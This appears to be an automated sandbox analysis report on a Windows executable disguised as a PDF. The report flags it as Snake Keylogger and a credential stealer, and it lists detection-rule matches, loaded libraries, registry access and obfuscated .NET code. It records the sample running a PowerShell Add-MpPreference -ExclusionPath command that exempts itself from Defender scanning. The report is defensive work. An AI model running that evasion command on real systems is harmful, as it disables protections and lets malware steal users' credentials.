Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: INQUIRY_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, i7FUjIt708boJ4kPOi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	Security API names: _0020.SetAccessControl
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	Security API names: _0020.AddAccessRule
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	Security API names: _0020.SetAccessControl
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	Security API names: _0020.AddAccessRule
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, i7FUjIt708boJ4kPOi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/3

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQUIRY_pdf.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ilx4ls3.5y5.ps1

Jump to behavior

Source: INQUIRY_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: INQUIRY_pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: INQUIRY_pdf.exe

ReversingLabs: Detection: 24%

Source: unknown	Process created: C:\Users\user\Desktop\INQUIRY_pdf.exe "C:\Users\user\Desktop\INQUIRY_pdf.exe"
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY_pdf.exe "C:\Users\user\Desktop\INQUIRY_pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY_pdf.exe "C:\Users\user\Desktop\INQUIRY_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{41B89B6B-9399-11D2-9623-00C04F8EE628}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: INQUIRY_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: INQUIRY_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	.Net Code: uLun9UHBlM System.Reflection.Assembly.Load(byte[])
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	.Net Code: uLun9UHBlM System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078ADE79 push 50078E98h; retf		0_2_078ADE85
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_01089C30 push esp; retf 010Ah		4_2_01089D55

Source: INQUIRY_pdf.exe

Static PE information: section name: .text entropy: 7.922613028322462

Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, txedKMryF6wYwZKkGE6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvtfWl5Vc5', 's7JfE41bcW', 'JfVfio1dHi', 'rrRfchaBiq', 'pYvfQ2IrO9', 'wuBf70Wn3F', 'aUmfPLckNp'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, mpKrITvPprZVQf913B.cs	High entropy of concatenated method names: 'YO1AHdS2NO', 'FFOAMZW5yU', 'cLTA9yysMK', 'NvbABDxOa0', 'ro3AXr5svv', 'TBnA6FSXx9', 'e0RA3e3tqH', 'IicAt8pXa8', 'uTvA5U0jY4', 'LgPAaMEuo6'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, scGOCV5LyL1v4tQrEQ.cs	High entropy of concatenated method names: 'IdsSBNmAST', 'ktvS67JSvh', 'NGWSt3701E', 'RR5S5cM63h', 'Qe7SlgddHA', 'hFtSw5WqkI', 'aJySmLQUyH', 'RdqSbSA60R', 'lVnS2Q3UQf', 'pINSfN1jCu'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, WytqDWV6MeUIjEhnkW.cs	High entropy of concatenated method names: 'S1JmqHfj6T', 'SJGmK9lodg', 'QTIbyM1Dhp', 'K07br951Op', 'TscmW3XXRT', 'JfTmErXEdu', 'mommiKZ6lx', 'SYnmcu1lU6', 'Bk2mQemQ5y', 'qFgm7GrGQE'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, uxPUncimL7unLtP6tA.cs	High entropy of concatenated method names: 'yDFht8J4MN', 'u23h53DLgl', 'f5Iho8AHZC', 'Nu0hg2FSM9', 'KWbhFr8nOt', 'gLoh0Hq0qK', 'cTChOftOgI', 'U6ZhIJQuiF', 'jKkhGk3dkJ', 'y8UhWAr2yw'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, TnNptTrrOdK87Xbw3xR.cs	High entropy of concatenated method names: 'nvAfKZmmyi', 'BUkfzVS3pc', 'E8J4yy27Br', 'AJ04r6jMEg', 'vsX4epoFgJ', 'UQf4Nf55fi', 'Ynj4niODap', 'DuF4Uau6xn', 'kIN4TdgIEI', 'UP74x21lCW'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	High entropy of concatenated method names: 'z7ONUG9T3m', 'oxRNTbQotv', 'BcXNxAyub5', 'rl9NSHRnYB', 'H8ONLqVy0S', 'gQvNRVqbYx', 'EMUNAJX7fN', 'sj5Ns3bSL2', 'konNDBWFRL', 'LQZNkB5q2v'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, xN0vcYP0IiMwJXOaIy.cs	High entropy of concatenated method names: 'z5rmknDrsD', 'O1wm8CF1CV', 'ToString', 'TaomT4AfsR', 'rwVmxIv6DA', 'mWFmSNn7y7', 'eMmmL4JoQN', 'r3RmRA8sxV', 'KHPmAbQ3by', 'wbYmshsAjj'
